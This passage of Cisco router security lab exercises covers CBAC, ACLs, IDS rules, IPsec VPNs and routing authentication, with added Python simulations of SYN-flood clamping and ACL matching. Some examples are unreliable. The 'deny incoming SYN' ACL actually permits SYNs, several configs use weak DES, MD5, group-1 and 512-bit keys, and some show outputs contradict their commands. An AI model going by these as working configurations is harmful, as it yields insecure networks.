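        self.cfg = cfg
        self.half_open: Dict[Key, float] = {}  # insertion ordered, so oldest first
        self.attempts: Deque[float] = deque()  # SYN timestamps inside the last 60 s
        self.clamping = False
        self.stats = {"expired": 0, "clamped": 0, "host_limit": 0}

    def _expire(self, now: float) -> None:
        """Drop sessions that waited longer than synwait-time; age the one-minute window."""
        for key, started in list(self.half_open.items()):
            if now - started > self.cfg.tcp_synwait_time:
                del self.half_open[key]
                self.stats["expired"] += 1
        while self.attempts and now - self.attempts[0] >= 60:
            self.attempts.popleft()

    def _oldest_for_host(self, dst: str) -> Optional[Key]:
        for key in self.half_open:
            if key[1] == dst:
                return key
        return None

    def syn(self, now: float, src: str, dst: str, dport: int) -> str:
        """Register a connection attempt; returns what the tracker did with it."""
        self._expire(now)
        key: Key = (src, dst, dport)
        if key in self.half_open:
            return "retransmit"
        self.attempts.append(now)
        # Per-destination-host limit: make room by dropping that host's oldest session.
        to_host = sum(1 for k in self.half_open if k[1] == dst)
        oldest_to_host = self._oldest_for_host(dst)
        if to_host >= self.cfg.tcp_max_incomplete_host and oldest_to_host is not None:
            del self.half_open[oldest_to_host]
            self.stats["host_limit"] += 1
        self.half_open[key] = now
        rate, count = len(self.attempts), len(self.half_open)
        if rate > self.cfg.one_minute_high or count > self.cfg.max_incomplete_high:
            self.clamping = True
        elif rate < self.cfg.one_minute_low and count < self.cfg.max_incomplete_low:
            self.clamping = False
        action = "accepted"
        if self.clamping:
            oldest = next(iter(self.half_open))
            if oldest != key:  # never delete the session just created
                del self.half_open[oldest]
                self.stats["clamped"] += 1
                action = "clamped"
        return action

    def established(self, now: float, src: str, dst: str, dport: int) -> bool:
        """Handshake completed: the session stops counting as half-open."""
        self._expire(now)
        return self.half_open.pop((src, dst, dport), None) is not None


if __name__ == "__main__":
    # Constructed SYN flood: 420 distinct attempts against one server within a minute.
    tracker = HalfOpenTracker(InspectConfig())
    for i in range(420):
        tracker.syn(i * 0.1, f"198.51.100.{i % 254}", "192.0.2.10", 80 + i // 254)
    print(len(tracker.half_open), "half-open;", tracker.stats, "clamping:", tracker.clamping)
```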

Cisco Router Challenge 45


Outline
This challenge involves the configuration of a context based access-list (CBAC).
Objectives
The objectives of this challenge are to:

Set up a CBAC.
Define the protocols which the CBAC applies to.

Example
> en
# config t
(config)# access-list 105 permit ip any any
(config)# int fa0/0
(config-if)# ip access-group 105 in
(config-if)# exit
(config)# ip inspect name cisco ?
  cuseeme      CUSeeMe Protocol
  fragment     IP fragment inspection
  ftp          File Transfer Protocol
  h323         H.323 Protocol (e.g, MS NetMeeting, Intel Video Phone)
  http         HTTP Protocol
  netshow      Microsoft NetShow Protocol
  rcmd         R commands (r-exec, r-login, r-sh)
  realaudio    Real Audio Protocol
  rpc          Remote Procedure Call Protocol
  rtsp         Real Time Streaming Protocol
  smtp         Simple Mail Transfer Protocol
  sqlnet       SQL Net Protocol
  streamworks  StreamWorks Protocol
  tcp          Transmission Control Protocol
  tftp         TFTP Protocol
  udp          User Datagram Protocol
  vdolive      VDOLive Protocol
(config)# ip inspect name cisco tcp
(config)# ip inspect name cisco udp
(config)# ip inspect name cisco ftp
(config)# ip inspect name cisco sqlnet
(config)# int e0
(config-if)#ip inspect ?
WORD Name of inspection defined
(config-if)#ip inspect cisco
(config-if)#ip inspect cisco in
(config-if)# exit
(config)# access-list 106 deny ip any any
(config)# int s0
(config-if)# ip access-group 106 in

Explanation
ACLs are fairly static in their operation: they do not take into account the context of a
data packet, so they cannot detect the actual state of a connection. A typical type of attack
on a system is DoS (Denial-of-Service), which is caused when multiple remote clients make
access to the same server. Knowing the context of a data packet, or of its associated
connection, thus allows finer control of the security of the system. For example, in a DoS the
firewall could detect that the number of connections within a given time limit had exceeded
a given number, and block any further ones for a given time. Context-based Access Control
(CBAC) is thus stateful and dynamic, and can look further into packets than normal ACLs.
In client-server communications the key states in most connections are:

Client sends a SYN flag to the server.
The server responds with a SYN, ACK to the client.
The client responds with an ACK, and the connection is made.
The client and server then communicate.
The client sends a FIN, ACK flag.
The server sends an ACK flag, and the connection is finished.

Context-based Access Control is used to implement firewall options, such as limiting the
number of open connections. A typical attack is the DoS (Denial of Service) attack, where
the external party opens up multiple connections. To overcome this, the router can be set up
to detect a threshold for half-open sessions. A half-open session is one where either the
client or the server quits the session without the other side knowing about it. In a DoS, the
client opens a connection and does not complete it. The server does not know that the client
has disconnected, so the connection still takes some resources on the server, which can
become overburdened if there are many open sessions. On the Napier pods, use Pod C
(Router 1) for an example of a router which implements these CBACs.
Global timeouts and thresholds
The main limits that are defined are:

ip inspect tcp synwait-time. This defines the time to wait before a connection drops.
Default: 30 seconds.
ip inspect tcp finwait-time. This defines the time after a FIN flag for a connection to be
dropped. Default: 5 seconds.
ip inspect tcp idle-time. This defines the length of time that a connection can be idle.
Default: 1 hour.
ip inspect dns-timeout. This defines the time-out for a DNS query. Default: 5 seconds.
ip inspect max-incomplete high. This defines the maximum number of half-open
connections before the router starts to delete them one-by-one. Default: 500.
ip inspect max-incomplete low. This defines the lower limit for the half-open
connections. Default: 400.
ip inspect one-minute high. This defines the maximum number of half-open
connections in a minute before the router starts to delete them one-by-one. Default: 500 per
minute.
ip inspect one-minute low. This defines the lower limit for the half-open connections
over a minute. Default: 400.

For example, to limit the maximum open sessions at any time to between 900 and 1100:
(config)# ip inspect ?
alert-off       Disable alert
audit-trail     Enable the logging of session information (addresses and bytes)
dns-timeout     Specify timeout for DNS
max-incomplete  Specify maximum number of incomplete connections before clamping
name            Specify an inspection rule
one-minute      Specify one-minute-sample watermarks for clamping
tcp             Config timeout values for tcp connections
udp             Config timeout values for udp flows
<cr>
(config)# ip inspect tcp ?
finwait-time    Specify timeout for TCP connections after a FIN
idle-time       Specify idle timeout for tcp connections
max-incomplete  Specify max half-open connection per host
synwait-time    Specify timeout for TCP connections after a SYN and no further data
(config)# ip inspect max-incomplete low 900
(config)# ip inspect max-incomplete high 1100

and for the maximum open sessions for one minute:

(config)# ip inspect one-minute low 900
(config)# ip inspect one-minute high 1100

To remove an ip inspect setting, use the no form of the command, for example:

(config)# no ip inspect one-minute low

To limit the DNS timeout to 10 seconds:

(config)# ip inspect dns-timeout 10
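The half-open session bookkeeping described above, as an added Python model (not the page's or NetworkSims' code, and not the IOS implementation): it tracks TCP handshakes per client flow, tears down half-open sessions after synwait-time, and applies the max-incomplete and one-minute high/low watermarks, deleting the oldest half-open session for each new SYN while clamping is in effect. The class and function names, the addresses and the trace in simulate() are constructed, and the thresholds passed in are lowered from the defaults so the clamping shows on a handful of flows.

```python
from collections import OrderedDict
from dataclasses import dataclass


@dataclass
class CbacThresholds:
    """Global CBAC limits; the defaults are the IOS defaults listed above."""
    synwait_time: int = 30          # seconds a half-open session may wait for its ACK
    max_incomplete_high: int = 500  # clamping starts above this many half-open sessions
    max_incomplete_low: int = 400   # ... and stops once the count is back at or below this
    one_minute_high: int = 500      # same pair, but for new half-open sessions per minute
    one_minute_low: int = 400


class HalfOpenTracker:
    """Stateful half-open (embryonic) TCP session tracker modelled on CBAC."""

    def __init__(self, th=None):
        self.th = th or CbacThresholds()
        self.half_open = OrderedDict()  # client flow -> time its SYN was seen (oldest first)
        self.established = set()
        self.new_in_window = []         # SYN timestamps within the last 60 seconds
        self.clamping = False
        self.deleted = []               # (time, flow, reason) audit trail of torn-down sessions

    def _expire(self, now):
        # synwait-time: a SYN with no further data is dropped once the timer runs out
        for flow, t0 in list(self.half_open.items()):
            if now - t0 > self.th.synwait_time:
                del self.half_open[flow]
                self.deleted.append((now, flow, "synwait-time"))
        self.new_in_window = [t for t in self.new_in_window if now - t < 60]

    def _above_high(self):
        return (len(self.half_open) > self.th.max_incomplete_high
                or len(self.new_in_window) > self.th.one_minute_high)

    def _at_or_below_low(self):
        return (len(self.half_open) <= self.th.max_incomplete_low
                and len(self.new_in_window) <= self.th.one_minute_low)

    def event(self, now, flow, flags):
        """Feed one client-side TCP segment.

        flow  - (client_ip, client_port, server_ip, server_port); the server's SYN/ACK is
                not needed, the session leaves the half-open table on the client's ACK
        flags - set of flag names, e.g. {"SYN"}, {"ACK"}, {"FIN", "ACK"}
        """
        self._expire(now)
        if flags == {"SYN"}:
            self.half_open[flow] = now
            self.new_in_window.append(now)
            if self._above_high():
                self.clamping = True
            if self.clamping:
                if self._at_or_below_low():
                    self.clamping = False
                else:
                    # make room for the new request by deleting the oldest half-open session
                    victim, _ = self.half_open.popitem(last=False)
                    self.deleted.append((now, victim, "max-incomplete"))
        elif "ACK" in flags and "SYN" not in flags and flow in self.half_open:
            del self.half_open[flow]           # third packet of the handshake
            self.established.add(flow)
        elif flags & {"FIN", "RST"}:
            self.half_open.pop(flow, None)
            self.established.discard(flow)

    def half_open_count(self):
        return len(self.half_open)


def simulate(th):
    """Constructed trace: three completed handshakes, then six bare SYNs from one source
    that are never followed by an ACK (the half-open pattern the text describes)."""
    trk = HalfOpenTracker(th)
    server = "192.168.1.10"
    for i in range(3):
        flow = ("10.0.0.%d" % (i + 1), 40000 + i, server, 80)
        trk.event(i, flow, {"SYN"})
        trk.event(i + 0.1, flow, {"ACK"})
    for i in range(6):
        trk.event(10 + i, ("203.0.113.9", 50000 + i, server, 80), {"SYN"})
    return trk


if __name__ == "__main__":
    t = simulate(CbacThresholds(max_incomplete_high=4, max_incomplete_low=2))
    print("half-open:", t.half_open_count(), "clamping:", t.clamping)
    for entry in t.deleted:
        print("deleted", entry)
```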

Cisco Router Challenge 46


Outline
This challenge involves the configuration of a port map.
Objectives
The objectives of this challenge are to:

Define the port-mapping for various protocols.

Example
> en
# config t
(config)# ip port-map http port 1126
(config)# ip port-map ftp port 1188
(config)# ip port-map smtp port 1897
(config)# ip port-map telnet port 1189
(config)# exit
# show ip port-map
Default mapping: vdolive       port 7000   system defined
Default mapping: sunrpc        port 111    system defined
Default mapping: netshow       port 1755   system defined
Default mapping: cuseeme       port 7648   system defined
Default mapping: tftp          port 69     system defined
Default mapping: rtsp          port 8554   system defined
Default mapping: realmedia     port 7070   system defined
Default mapping: streamworks   port 1558   system defined
Default mapping: ftp           port 21     system defined
Default mapping: telnet        port 23     system defined
Default mapping: rtsp          port 554    system defined
Default mapping: h323          port 1720   system defined
Default mapping: sip           port 5060   system defined
Default mapping: smtp          port 25     system defined
Default mapping: http          port 80     system defined
Default mapping: msrpc         port 135    system defined
Default mapping: exec          port 512    system defined
Default mapping: login         port 513    system defined
Default mapping: sql-net       port 1521   system defined
Default mapping: shell         port 514    system defined
Default mapping: mgcp          port 2427   system defined
Default mapping: http          port 1126   user defined
Default mapping: ftp           port 1188   user defined
Default mapping: smtp          port 1897   user defined
Default mapping: telnet        port 1189   user defined

Explanation
Many ports are well-known on the Internet, such as port 23 for Telnet and port 80 for HTTP.
In many situations the port mapping to the protocol is not standard, such as HTTP
using port 8080. The ip port-map command can be used to remap ports to their application.
An example of the command is:
(config)# ip port-map ?
cuseeme      CUSeeMe Protocol
dns          Domain Name Server
exec         Remote Process Execution
finger       Finger
ftp          File Transfer Protocol
gopher       Gopher
h323         H.323 Protocol (e.g., MS NetMeeting, Intel Video Phone)
http         Hypertext Transfer Protocol
imap         Internet Message Access Protocol
kerberos     Kerberos
ldap         Lightweight Directory Access Protocol
login        Remote login
lotusnote    Lotus Note
mgcp         Media Gateway Control Protocol
ms-sql       Microsoft SQL
msrpc        Microsoft Remote Procedure Call
netshow      Microsoft NetShow
nfs          Network File System
nntp         Network News Transfer Protocol
pop2         Post Office Protocol - Version 2
pop3         Post Office Protocol - Version 3
realmedia    RealNetwork's Realmedia Protocol
rtsp         Real Time Streaming Protocol
sap          SAP
shell        Remote command
sip          Session Initiation Protocol
smtp         Simple Mail Transfer Protocol
snmp         Simple Network Management Protocol
sql-net      SQL-NET
streamworks  StreamWorks Protocol
sunrpc       SUN Remote Procedure Call
sybase-sql   Sybase SQL
tacacs       Login Host Protocol (TACACS)
telnet       Telnet
tftp         Trivial File Transfer Protocol
vdolive      VDOLive Protocol

So, for example, to map HTTP to port 8080:

(config)# ip port-map http port 8080

Then to show the port mapping:

# show ip port-map
Default mapping: vdolive       port 7000   system defined
Default mapping: sunrpc        port 111    system defined
Default mapping: netshow       port 1755   system defined
Default mapping: cuseeme       port 7648   system defined
Default mapping: tftp          port 69     system defined
Default mapping: rtsp          port 8554   system defined
Default mapping: realmedia     port 7070   system defined
Default mapping: streamworks   port 1558   system defined
Default mapping: ftp           port 21     system defined
Default mapping: telnet        port 23     system defined
Default mapping: http          port 8080   user defined
Default mapping: rtsp          port 554    system defined
Default mapping: h323          port 1720   system defined
Default mapping: sip           port 5060   system defined
Default mapping: smtp          port 25     system defined
Default mapping: http          port 80     system defined
Default mapping: msrpc         port 135    system defined
Default mapping: exec          port 512    system defined
Default mapping: login         port 513    system defined
Default mapping: sql-net       port 1521   system defined
Default mapping: shell         port 514    system defined
Default mapping: mgcp          port 2427   system defined
# show ip port-map http
Default mapping: http          port 8080   user defined
Default mapping: http          port 80     system defined

Cisco Router Challenge 47


Outline
This challenge involves the configuration of an audit trail.


Objectives
The objectives of this challenge are to:

Setup logging.
Define an audit-trail.

Example
> en
# config t
(config)# logging on
(config)# logging 150.74.40.1
(config)# logging ?
Hostname or A.B.C.D  IP address of the logging host
buffered             Set buffered logging parameters
cns-events           Set CNS Event logging level
console              Set console logging level
count                Count every log message and timestamp last occurrence
exception            Limit size of exception flush output
facility             Facility parameter for syslog messages
history              Configure syslog history table
host                 Set syslog server host name or IP address
monitor              Set terminal line (monitor) logging level
on                   Enable logging to all supported destinations
rate-limit           Set messages per second limit
source-interface     Specify interface for source address in logging transactions
trap                 Set syslog server logging level
(config)# logging host 18.46.203.4
(config)# logging trap ?
<0-7>          Logging severity level
alerts         Immediate action needed           (severity=1)
critical       Critical conditions               (severity=2)
debugging      Debugging messages                (severity=7)
emergencies    System is unusable                (severity=0)
errors         Error conditions                  (severity=3)
informational  Informational messages            (severity=6)
notifications  Normal but significant conditions (severity=5)
warnings       Warning conditions                (severity=4)
<cr>
(config)# logging trap warning
(config)# logging monitor warning
(config)# logging console warning
(config)# logging buffer ?
<0-7>              Logging severity level
<4096-2147483647>  Logging buffer size
alerts             Immediate action needed           (severity=1)
critical           Critical conditions               (severity=2)
debugging          Debugging messages                (severity=7)
emergencies        System is unusable                (severity=0)
errors             Error conditions                  (severity=3)
informational      Informational messages            (severity=6)
notifications      Normal but significant conditions (severity=5)
warnings           Warning conditions                (severity=4)
<cr>
(config)# logging buffer warnings
(config)# logging buffer 981997
(config)# ip inspect audit-trail
(config)# no ip inspect alert-off

Cisco Router Challenge 48


Outline
This challenge involves the configuration to deny an incoming SYN packet.
Objectives
The objectives of this challenge are to:

Apply an extended ACL which detects the SYN packet.

Example
> en
# config t
(config)# access-list 107 deny tcp any any ?
ack          Match on the ACK bit
dscp         Match packets with given dscp value
eq           Match only packets on a given port number
established  Match established connections
fin          Match on the FIN bit
fragments    Check non-initial fragments
gt           Match only packets with a greater port number
log          Log matches against this entry
log-input    Log matches against this entry, including input interface
lt           Match only packets with a lower port number
neq          Match only packets not on a given port number
precedence   Match packets with given precedence value
psh          Match on the PSH bit
range        Match only packets in the range of port numbers
rst          Match on the RST bit
syn          Match on the SYN bit
time-range   Specify a time-range
tos          Match packets with given TOS value
urg          Match on the URG bit
<cr>
(config)# access-list 107 deny tcp any any established
(config)# access-list 107 permit tcp any any
(config)# int s0
(config-if)# ip access-group ?
<1-199>      IP access list (standard or extended)
<1300-2699>  IP expanded access list (standard or extended)
WORD         Access-list name
(config-if)# ip access-group 107 ?
in   inbound packets
out  outbound packets
(config-if)# ip access-group 107 in
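An added Python evaluator (not the page's or NetworkSims' code) for extended TCP entries of the form used above, including the flag keywords from the help listing; the point it makes is that the `established` keyword matches segments with ACK or RST set, so under access-list 107 a bare SYN is permitted and ACK-bearing segments are denied. A constructed list 108 with the two entries the other way round is included for contrast; the Segment class, helper names and all addresses are constructed.

```python
import ipaddress
from dataclasses import dataclass

# Port names IOS accepts in place of numbers (only the ones needed here)
PORT_NAMES = {"ftp": 21, "telnet": 23, "smtp": 25, "www": 80, "snmp": 161, "isakmp": 500}
# Keywords that test one TCP flag bit, as listed in the help output above
FLAG_KEYWORDS = {"ack": "ACK", "fin": "FIN", "psh": "PSH", "rst": "RST", "syn": "SYN", "urg": "URG"}


@dataclass(frozen=True)
class Segment:
    src: str
    dst: str
    sport: int
    dport: int
    flags: frozenset   # e.g. frozenset({"SYN"})


def _port(tok):
    return int(tok) if tok.isdigit() else PORT_NAMES[tok]


def _addr_spec(tok, i):
    """Parse 'any' | 'host A.B.C.D' | 'A.B.C.D wildcard' starting at tok[i]."""
    if tok[i] == "any":
        return ("any", None), i + 1
    if tok[i] == "host":
        return ("net", (tok[i + 1], "0.0.0.0")), i + 2
    return ("net", (tok[i], tok[i + 1])), i + 2


def _addr_match(spec, ip):
    kind, value = spec
    if kind == "any":
        return True
    net, wild = (int(ipaddress.IPv4Address(x)) for x in value)
    care = ~wild & 0xFFFFFFFF   # wildcard bit 1 means "don't care", so compare the 0 bits
    return (int(ipaddress.IPv4Address(ip)) & care) == (net & care)


def parse_ace(line):
    """Parse 'access-list N {permit|deny} tcp SRC [eq P] DST [eq P] [keywords ...]'."""
    tok = line.split()
    if len(tok) < 6 or tok[0] != "access-list" or tok[3] != "tcp":
        raise ValueError("only extended TCP entries are modelled: " + line)
    src, i = _addr_spec(tok, 4)
    sport = None
    if tok[i] == "eq":
        sport, i = _port(tok[i + 1]), i + 2
    dst, i = _addr_spec(tok, i)
    dport = None
    if i < len(tok) and tok[i] == "eq":
        dport, i = _port(tok[i + 1]), i + 2
    return {"action": tok[2], "src": src, "sport": sport, "dst": dst, "dport": dport,
            "keywords": tok[i:]}


def ace_matches(ace, seg):
    if not (_addr_match(ace["src"], seg.src) and _addr_match(ace["dst"], seg.dst)):
        return False
    if ace["sport"] is not None and seg.sport != ace["sport"]:
        return False
    if ace["dport"] is not None and seg.dport != ace["dport"]:
        return False
    for kw in ace["keywords"]:
        if kw == "established":
            # 'established' is true when ACK or RST is set; a bare SYN never matches it
            if not (seg.flags & {"ACK", "RST"}):
                return False
        elif kw in FLAG_KEYWORDS:
            if FLAG_KEYWORDS[kw] not in seg.flags:
                return False
        elif kw not in ("log", "log-input"):
            raise ValueError("keyword not modelled: " + kw)
    return True


def evaluate(acl_lines, seg):
    """First matching entry decides; every IOS ACL ends with an implicit deny."""
    for line in acl_lines:
        ace = parse_ace(line)
        if ace_matches(ace, seg):
            return ace["action"]
    return "deny"


# The page's list 107: denies ACK/RST-bearing segments and permits everything else,
# so a bare SYN (a new inbound connection attempt) passes.
ACL_107 = ["access-list 107 deny tcp any any established",
           "access-list 107 permit tcp any any"]
# Constructed list 108 (not on the page) with the two entries the other way round:
# replies to sessions opened from inside pass, new inbound SYNs are dropped.
ACL_108 = ["access-list 108 permit tcp any any established",
           "access-list 108 deny tcp any any"]


def decisions(acl_lines):
    """Evaluate one inbound SYN and one inbound ACK against an ACL (constructed addresses)."""
    syn = Segment("203.0.113.5", "192.168.1.10", 40000, 23, frozenset({"SYN"}))
    ack = Segment("203.0.113.5", "192.168.1.10", 40000, 23, frozenset({"ACK"}))
    return {"SYN": evaluate(acl_lines, syn), "ACK": evaluate(acl_lines, ack)}
```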

Cisco Router Challenge 54


Outline
This challenge involves the configuration of an authentication proxy.
Objectives
The objectives of this challenge are to:

Define AAA.
Setup an authentication proxy.

Example
> en
# config t
(config)# aaa new-model
(config)# ip http ?
access-class    Restrict access by access-class
authentication  Set http authentication method
path            Set base path for HTML
port            HTTP port
server          Enable HTTP server
(config)# ip http authentication ?
aaa     Use AAA access control methods
enable  Use enable passwords
local   Use local username and passwords
tacacs  Use tacacs to authorize user
(config)# ip http authentication aaa
(config)# ip auth-proxy ?
auth-cache-time    Authorization Cache Timeout in min
auth-proxy-audit   Authentication Proxy Auditing
auth-proxy-banner  Authentication Proxy Banner
name               Specify an Authentication Proxy Rule
<cr>
(config)# ip auth-proxy auth-cache-time ?
<1-35791>  Timeout in minutes
(config)# ip auth-proxy auth-cache-time 45
(config)# ip auth-proxy name yellow http
(config)# int fa0
(config-if)# ip auth-proxy ?
WORD  Name of authentication proxy rule
(config-if)# ip auth-proxy yellow
(config-if)# exit
(config)# exit
# show ip auth-proxy configuration
Authentication global cache time is 40 minutes
Authentication Proxy Rule Configuration
Auth-proxy name testing
http list not specified auth-cache-time 40 minutes

Cisco Router Challenge 55


Outline
This challenge involves the configuration of IDS rules.
Objectives
The objectives of this challenge are to:

Setup IDS rules.
Define a SPAM filter.

Example
> en
# config t
(config)# ip audit ?
attack     Specify default action for attack signatures
info       Specify default action for informational signatures
name       Specify an IDS audit rule
notify     Specify the notification mechanisms (nr-director or log) for the alarms
po         Specify nr-director's PostOffice information (for sending events to the nr-directors)
signature  Add a policy to a signature
smtp       Specify SMTP Mail spam threshold
(config)# ip audit notify ?
log          Send events as syslog messages
nr-director  Send events to the nr-director
(config)# ip audit notify log
(config)# logging 132.191.125.3
(config)# ip audit ?
attack     Specify default action for attack signatures
info       Specify default action for informational signatures
name       Specify an IDS audit rule
notify     Specify the notification mechanisms (nr-director or log) for the alarms
po         Specify nr-director's PostOffice information (for sending events to the nr-directors)
signature  Add a policy to a signature
smtp       Specify SMTP Mail spam threshold
(config)# ip audit info ?
action  Specify the actions
(config)# ip audit info action ?
alarm  Generate events for matching signatures
drop   Drop packets matching signatures
reset  Reset the connection (if applicable)
(config)# ip audit info action drop
(config)# ip audit attack action reset
(config)# ip audit signature ?
<1-65535>  Signature to be configured
(config)# ip audit signature 1005 disable
(config)# ip audit smtp ?
spam  Specify the threshold for spam signature
<cr>
(config)# ip audit smtp spam ?
<1-65535>  Threshold of correspondents to trigger alarm
(config)# ip audit smtp spam 4

Cisco Router Challenge 56


Outline
This challenge involves setting up IKE for a VPN connection.
Objectives
The objectives of this challenge are to:

Define the IKE policy.
Define encryption.
Define hash function.
Define authentication type.
Define identity type.
Define authentication key and address (for pre-share authentication).
Define the transform set.

Example
> en
# config t
(config)# crypto isakmp enable
(config)# crypto isakmp policy 111
(config-isakmp)# encryption des
(config-isakmp)# hash sha
(config-isakmp)# authentication pre-share
(config-isakmp)# group 1
(config-isakmp)# exit
(config)# crypto isakmp identity hostname
(config)# crypto isakmp key test address 192.168.1.1
(config)# crypto ipsec transform-set test esp-des

Cisco Router Challenge 57


Outline
This challenge involves setting up a crypto map and applying it to an interface.
Objectives
The objectives of this challenge are to:

Define a crypto access-list, to identify the traffic to encrypt.
Define IKE.
Define a crypto map.
Bind the ACL with the crypto map.
Apply crypto map to E0.
Show the tunnel details.

Example
> en
# config t
(config)# hostname newhampshire
(config)# access-list 109 permit ip 50.93.142.0 0.0.255.255 136.163.130.0 0.0.255.255
(config)# crypto isakmp enable
(config)# crypto isakmp policy 111
(config-isakmp)# ?
ISAKMP commands:
authentication  Set authentication method for protection suite
default         Set a command to its defaults
encryption      Set encryption algorithm for protection suite
exit            Exit from ISAKMP protection suite configuration mode
group           Set the Diffie-Hellman group
hash            Set hash algorithm for protection suite
lifetime        Set lifetime for ISAKMP security association
no              Negate a command or set its defaults
(config-isakmp)# en ?
3des  Three key triple DES
aes   AES - Advanced Encryption Standard.
des   DES - Data Encryption Standard (56 bit keys).
(config-isakmp)# encryption des
(config-isakmp)# hash ?
md5  Message Digest 5
sha  Secure Hash Standard
(config-isakmp)# hash sha
(config-isakmp)# authentication ?
pre-share  Pre-Shared Key
rsa-encr   Rivest-Shamir-Adleman Encryption
rsa-sig    Rivest-Shamir-Adleman Signature
(config-isakmp)# authentication pre-share
(config-isakmp)# g ?
1  Diffie-Hellman group 1
2  Diffie-Hellman group 2
5  Diffie-Hellman group 5
(config-isakmp)# group 1
(config-isakmp)# exit
(config)# crypto isakmp identity hostname
(config)# crypto isakmp key test address 192.168.1.1
(config)# crypto ipsec transform-set finland esp-des
(config)# crypto map Manchester 10 ipsec-isakmp
(config-crypto-map)# ?
Crypto Map configuration commands:
default        Set a command to its defaults
description    Description of the crypto map statement policy
dialer         Dialer related commands
exit           Exit from crypto map configuration mode
match          Match values.
no             Negate a command or set its defaults
qos            Quality of Service related commands
reverse-route  Reverse Route Injection.
set            Set values for encryption/decryption
(config-crypto-map)# match ?
address  Match address of packets to encrypt.
(config-crypto-map)# match address ?
<100-199>    IP access-list number
<2000-2699>  IP access-list number (expanded range)
WORD         Access-list name
(config-crypto-map)# match address 109
(config-crypto-map)# set ?
identity              Identity restriction.
isakmp-profile        Specify isakmp Profile
peer                  Allowed Encryption/Decryption peer.
pfs                   Specify pfs settings
security-association  Security association parameters
transform-set         Specify list of transform sets in priority order
(config-crypto-map)# set peer 144.55.62.1
(config-crypto-map)# set transform-set ?
WORD  Proposal tag
(config-crypto-map)# set transform-set finland
(config-crypto-map)# set pfs group1
(config-crypto-map)# exit
(config)# int e0
(config-if)# ip address 192.168.1.1 255.255.255.0
(config-if)# no shut
(config-if)# crypto map Manchester
(config-if)# exit
(config)# exit
# show crypto ipsec sa
interface: E0
Crypto map tag: Manchester, local addr 192.168.1.1
protected vrf: (none)
local ident (addr/mask/prot/port): (50.93.0.0/255.255.0.0/0/0)
remote ident (addr/mask/prot/port): (136.163.0.0/255.255.0.0/0/0)
current_peer 192.168.1.1 port 500
PERMIT, flags={origin_is_acl,}
#pkts encaps: 43, #pkts encrypt: 43, #pkts digest: 43
#pkts decaps: 43, #pkts decrypt: 43, #pkts verify: 43
#pkts compressed: 0, #pkts decompressed: 0
#pkts not compressed: 0, #pkts compr. failed: 0
#pkts not decompressed: 0, #pkts decompress failed: 0
#send errors 4, #recv errors 0
local crypto endpt.: 192.168.1.1, remote crypto endpt.: 144.55.62.1
path mtu 1500, ip mtu 1500, ip mtu idb E0
current outbound spi: 0x267BC43(40352835)
inbound esp sas:
spi: 0xD9F4BC76(3656694902)
transform: esp-des
in use settings ={Tunnel, }
conn id: 2001, flow_id: SW:1, crypto map: Manchester
sa timing: remaining key lifetime (k/sec): (4558868/3550)
IV size: 8 bytes
replay detection support: Y
Status: ACTIVE
inbound ah sas:
inbound pcp sas:
outbound esp sas:
spi: 0x267BC43(40352835)
transform: esp-des
in use settings ={Tunnel, }
conn id: 2002, flow_id: SW:2, crypto map: Manchester
sa timing: remaining key lifetime (k/sec): (4558868/3548)
IV size: 8 bytes
replay detection support: Y
Status: ACTIVE
outbound ah sas:
outbound pcp sas:
# show crypto isakmp sa
dst              src              state     conn-id  slot  status
144.55.62.1      192.168.1.1      QM_IDLE   1        0     ACTIVE

Cisco Router Challenge 58


Outline
This challenge involves setting an access-list to allow IPSec.
Objectives
The objectives of this challenge are to:

Create an access-list which allows AHP, ESP and ISAKMP.
Apply the access-list.

Example
> en
# config t
(config)# hostname london
london (config)# access-list 101 permit ahp host 117.84.81.2 host 61.222.47.2
london (config)# access-list 101 permit esp host 117.84.81.2 host 61.222.47.2
london (config)# access-list 101 permit udp host 117.84.81.2 host 61.222.47.2 eq isakmp
london (config)# int e0
london (config-if)# ip address 136.22.25.1 255.252.0.0
london (config-if)# no shut
london (config-if)# ip access-group 101 in

Cisco Router Challenge 60


Outline
This challenge involves blocking SNMP.
Objectives
The objectives of this challenge are to:

Define an access-list to block SNMP.
Apply the access-list.
Disable SNMP-server commands.

Example
> en
# config t
(config)# access-list 110 deny udp any any eq snmp
(config)# int e0
(config-if)# ip access-group 110 in
(config-if)# exit
(config)# service timestamps log datetime
(config)# service sequence-numbers
(config)# service dhcp
(config)# service finger
(config)# no service tcp-small-servers
(config)# no service udp-small-servers
(config)# service password-encryption
(config)# no snmp-server community annt RO
(config)# no snmp-server contact steven
(config)# no snmp-server location uk
(config)# no snmp-server host 78.113.70.11
(config)# no snmp-server enable traps
(config)# no snmp-server chassis-ID paris

Cisco Router Challenge 61


Outline
This challenge involves manually configuring RSA keys for peers.
Objectives
The objectives of this challenge are to:

Define the public key for a given host.
Specify the key.

Example
> en
# config t
(config)# crypto key pubkey-chain rsa
(config-pubkey-chain)# addressed-key 142.217.4.10
(config-pubkey-key)# key-string 01234567 01234567 01234567 01234567
(config-pubkey-key)# key-string 01234567 01234567 01234567 01234567
(config-pubkey-key)# key-string 01234567 01234567 01234567 01234567
(config-pubkey-key)# key-string 01234567 01234567 01234567 01234567
(config-pubkey-key)# key-string 01234567 01234567 01234567 01234567
(config-pubkey-key)# key-string 01234567 01234567 01234567 01234567
(config-pubkey-key)# key-string 01234567 01234567 01234567 0123
(config-pubkey-key)# exit
(config-pubkey-chain)# exit
(config)# exit
# show crypto key pubkey rsa

Cisco Router Challenge 62


Outline
This challenge involves the setup of authenticated routing protocols.
Objectives
The objectives of this challenge are to:

Define EIGRP.
Apply MD5 authentication on an interface.
Define the authentication key chain.

Example
# config t
(config)# router eigrp 142
(config-router)# network 205.104.0.0
(config-router)# int s0
(config-if)# ip address 205.118.116.6 255.255.255.224
(config-if)# ip authentication mode eigrp 142 md5
(config-if)# ip authentication key-chain eigrp 142 ann
(config-if)# exit
(config)# key chain ann
(config-keychain)# key 1
(config-keychain-key)# key-string hotel
(config-keychain-key)# exit

Router Challenge 124: SSH Explained


Outline: This challenge involves an analysis of SSH.
Objectives: The objectives of this challenge are to explain SSH.


Explanation
The TELNET protocol is insecure as the text is passed in plain text. An improved method is
to use SSH, which encrypts the data. It requires that a domain name is set and an RSA key
pair is generated:
ap# config t
Enter configuration commands, one per line.  End with CNTL/Z.
ap(config)# ip domain-name test.com
ap(config)# crypto key generate rsa
How many bits in the modulus [512]:
% Generating 512 bit RSA keys ...[OK]

To view the public key:

ap# show crypto key mypubkey rsa
% Key pair was generated at: 00:42:19 UTC Mar 1 2002
Key name: ap.test.com
Usage: General Purpose Key
Key is not exportable.
Key Data:
